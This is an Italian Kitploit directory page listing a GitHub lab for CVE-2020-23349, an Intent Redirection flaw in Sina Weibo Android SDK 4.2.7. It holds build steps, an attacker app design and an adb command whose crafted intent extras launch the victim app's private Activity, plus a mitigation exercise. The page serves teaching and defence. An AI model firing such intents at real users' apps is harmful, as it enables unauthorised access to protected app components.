Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-23349_Lab — Laboratorio Android didattico per CVE-2020-23349 in Sina Weibo SDK 4.2.7 | Kitploit
Strumenti/GitHubGitHub/lazybear8372/cve-2020-23349_lab
Sicurezza AndroidAnalisi delle VulnerabilitàExploitPentesting di App MobiliSicurezza MobileApprendimento e FormazioneLab e Pratica
GitHublazybear8372/cve-2020-23349_lab

CVE-2020-23349_Lab

Laboratorio Android didattico per CVE-2020-23349 in Sina Weibo SDK 4.2.7

Vedi Repository
91 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-23349 Android Lab

Progetto didattico per riprodurre localmente la vulnerabilità di Intent Redirection nell'SDK Android di Sina Weibo 4.2.7.

Utilizzare solo su dispositivi di test autorizzati o emulatori. Non utilizzarlo contro app di utenti reali.

Struttura

  • victim: app vulnerabile che include il reale openDefault-4.2.7.aar
  • attacker: app maliziosa che invoca l'WbShareTransActivity esportata
  • victim/.../PrivateActivity: destinazione della riproduzione con android:exported="false"

Il flusso vulnerabile è il seguente.

root@kitploit:~
App Attacker
  -> WbShareTransActivity esportata
  -> startActivity/gotoActivity nell'Intent Extra
  -> esecuzione di PrivateActivity della vittima

Build

Richiede Android SDK 36 e JDK 17.

root@kitploit:~
./gradlew clean assembleDebug

File generati:

root@kitploit:~
victim/build/outputs/apk/debug/victim-debug.apk
attacker/build/outputs/apk/debug/attacker-debug.apk

Installazione e riproduzione

root@kitploit:~
adb install -r victim/build/outputs/apk/debug/victim-debug.apk
adb install -r attacker/build/outputs/apk/debug/attacker-debug.apk
adb shell am start -n lab.cve202023349.attacker/.MainActivity
  1. Se necessario, eseguire una volta l'app Victim.
  2. Nell'app Attacker, premere il pulsante Launch private Activity.
  3. Se appare la schermata EXPLOIT SUCCESS, la riproduzione è riuscita.

Si può riprodurre anche direttamente tramite ADB.

root@kitploit:~
adb shell am start \
  -n lab.cve202023349.victim/com.sina.weibo.sdk.share.WbShareTransActivity \
  --es startActivity lab.cve202023349.victim.PrivateActivity \
  --es gotoActivity lab.cve202023349.victim.PrivateActivity

Perché funziona

L'SDK 4.2.7 si fida delle stringhe startActivity e gotoActivity dell'Intent esterno e le usa nella forma seguente.

root@kitploit:~
resultIntent.setClassName(this, startActivityName);
startActivity(resultIntent);

Poiché this è il Context dell'app Victim, Android tratta l'operazione come se fosse l'app Victim stessa a eseguire la propria Activity privata.

Nelle build Android moderne è obbligatorio specificare android:exported, quindi questo progetto imposta esplicitamente true in victim/AndroidManifest.xml per riprodurre lo stato implicitamente esportato dei vecchi SDK.

Esercitazione sulla mitigazione

Negli esercizi che non richiedono la funzionalità di condivisione, modificare i seguenti valori in false e ricompilare.

root@kitploit:~
<activity
    android:name="com.sina.weibo.sdk.share.WbShareTransActivity"
    android:exported="false" />

Successivamente, ripetendo lo stesso attacco si verrà bloccati da una SecurityException. Nei prodotti reali, è necessario rimuovere l'SDK Weibo 4.x e aggiornare all'ultima versione mantenuta.

Origine dell'SDK

L'AAR incluso proviene dal commit 4.2.7 del repository pubblico ufficiale di Sina Weibo.

  • Repository: https://github.com/sinaweibosdk/weibo_android_sdk
  • Commit: 99daf8a (4.2.7)
  • File: 新文档/openDefault-4.2.7.aar
Scarica lo strumento